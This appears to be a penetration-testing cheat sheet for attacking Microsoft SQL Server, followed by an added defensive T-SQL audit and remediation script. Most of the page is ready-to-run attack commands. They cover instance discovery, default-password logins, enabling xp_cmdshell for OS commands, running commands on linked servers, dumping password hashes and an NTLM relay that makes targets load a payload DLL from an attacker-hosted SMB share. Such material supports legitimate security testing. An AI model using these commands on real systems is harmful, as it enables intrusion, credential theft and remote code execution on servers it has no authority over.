SQL

ESC - Interactive .NET client for MSSQL abuse

https://github.com/NetSPI/ESC

Connect to MSSQL using Windows authentication (impacket mssqlclient.py)

mssqlclient.py <user>@<ip> -windows-auth

PowerUpSQL

https://github.com/NetSPI/PowerUpSQL

Identify SQL instances

Authenticated user

Get-SQLInstanceDomain [| Get-SQLServerInfo]

Unauthenticated user

Get-SQLInstanceScanUDP

Check login access

Attempt to login with a domain account

Get-SQLConnectionTestThreaded

Attempt to login with default password

Get-SQLServerLoginDefaultPw
powerpick Get-SQLInstanceDomain | Get-SQLServerLoginDefaultPw -Verbose

Save instances with authenticated access to CSV file

powerpick Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Threads 10 | Where-Object {$_.Status -like "Accessible"} | Export-Csv -Path .\targets.csv

Post-Exploitation on DB

Perform actions specifying a single instance or all connected targets

Import-Csv -Path .\targets.csv | Get-SQLServerInfo

Invoke-SQLAudit -Verbose -Instance "<INSTANCE>"

List DB, tables, columns

Get-SQLInstanceDomain | Get-SQLDatabase
Get-SQLInstanceDomain | Get-SQLTable -DatabaseName <DB_name>
Get-SQLInstanceDomain | Get-SQLColumn -DatabaseName <DB_name> -TableName <Table_name>

Search column names for given keywords and sample the matching data

Get-SQLInstanceDomain | Get-SQLColumnSampleData -Keywords "<word1,word2>" -Verbose -SampleSize 10

RCE

Invoke-SQLOSCmd -Verbose -Instance <instance_fqdn> -Command "<command>"

Crawling database links

Get-SQLServerLink
Get-SQLServerLinkCrawl
Get-SQLQuery -Instance "<SERVER1>" -Query 'EXEC "<SERVER2>".master..xp_cmdshell "whoami /all"'

SMB relay via xp_dirtree

Prerequisites

Step 1 - Create a virtual interface

ifconfig <IFACE>:0 <AVAILABLE_IP> netmask <NETMASK>

<IP1> will be the IP of the physical interface (eth0) and <IP2> the IP of the virtual interface (eth0:0)

Step 2 - Configure MSF

use admin/mssql/mssql_ntlm_stealer
set RHOSTS <MSSQL_RHOST>
set RPORT <RPORT>
set SMBPROXY <IP1>
set USE_WINDOWS_AUTHENT true

Step 3 - Start ntlmrelayx

sudo impacket-ntlmrelayx -smb2support -t <TARGET_RELAY> -c 'rundll32.exe \\<IP2>\public\<PAYLOAD>.dll,Start' -ip <IP1>

Step 4 - Host the payload via SMB share

sudo impacket-smbserver -smb2support public . -ip <IP2>

Step 5 - Start the attack in MSF

run

Enable XP_CMDSHELL

Type one line at a time.

EXEC sp_configure 'show advanced options', 1;
go
RECONFIGURE;
go
EXEC sp_configure 'xp_cmdshell', 1;
go
RECONFIGURE;
go
xp_cmdshell '<cmd>'
go

Nmap

nmap -Pn -n --script=ms-sql-xp-cmdshell.nse <victim_ip> -p1433 --script-args mssql.username=<sql_user>,mssql.password=<sql_password>,ms-sql-xp-cmdshell.cmd="<cmd>"

SQLCMD

sqlcmd -E -S localhost -Q "EXEC sp_databases;"
sqlcmd -E -S localhost -Q "SELECT name, password_hash FROM master.sys.sql_logins;"
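As an added defensive check, not part of the original page, PowerUpSQL or impacket: a T-SQL audit script that reports the instance settings the xp_cmdshell, link-crawl and xp_dirtree sections above depend on, then reverts xp_cmdshell. It assumes a login with sysadmin (or VIEW SERVER STATE plus VIEW ANY DEFINITION) and can be run with sqlcmd as in the last section, e.g. sqlcmd -E -S <instance> -i audit.sql.

```sql
-- Added audit script (not from the original page). Assumes sysadmin-level rights.

-- 1. Risky instance options: xp_cmdshell / OLE automation should report value_in_use = 0.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures', 'show advanced options');

-- 2. Linked servers and their credential mapping. A link that impersonates the caller
--    (uses_self_credential = 1) or maps every local login to a fixed remote login such
--    as sa, with RPC out enabled, is what Get-SQLServerLinkCrawl follows hop by hop.
SELECT s.name AS linked_server,
       s.data_source,
       s.is_rpc_out_enabled,
       ll.uses_self_credential,
       ll.remote_name,
       sp.name AS local_login        -- NULL = mapping applies to all local logins
FROM sys.servers AS s
JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals AS sp ON sp.principal_id = ll.local_principal_id
WHERE s.is_linked = 1;

-- 3. Who holds sysadmin (the role needed to flip xp_cmdshell on in the first place).
SELECT sp.name, sp.type_desc, sp.is_disabled
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS sp ON sp.principal_id = rm.member_principal_id
JOIN sys.server_principals AS r  ON r.principal_id  = rm.role_principal_id
WHERE r.name = 'sysadmin';

-- 4. Which principals may execute the extended procedures used for NTLM coercion
--    (xp_dirtree is executable by public out of the box; revoke it from low-privilege
--    logins, and require SMB signing on relay targets so the captured auth is useless).
SELECT pr.name AS grantee, o.name AS procedure_name, pe.permission_name, pe.state_desc
FROM master.sys.database_permissions AS pe
JOIN master.sys.objects AS o ON o.object_id = pe.major_id
JOIN master.sys.database_principals AS pr ON pr.principal_id = pe.grantee_principal_id
WHERE o.name IN ('xp_dirtree', 'xp_fileexist', 'xp_cmdshell');

-- 5. Remediation: reverse of the enable sequence above.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
```

Re-run query 1 afterwards; xp_cmdshell should report 0, and any linked server from query 2 that maps to sa or impersonates the caller should be re-mapped to a least-privilege remote login.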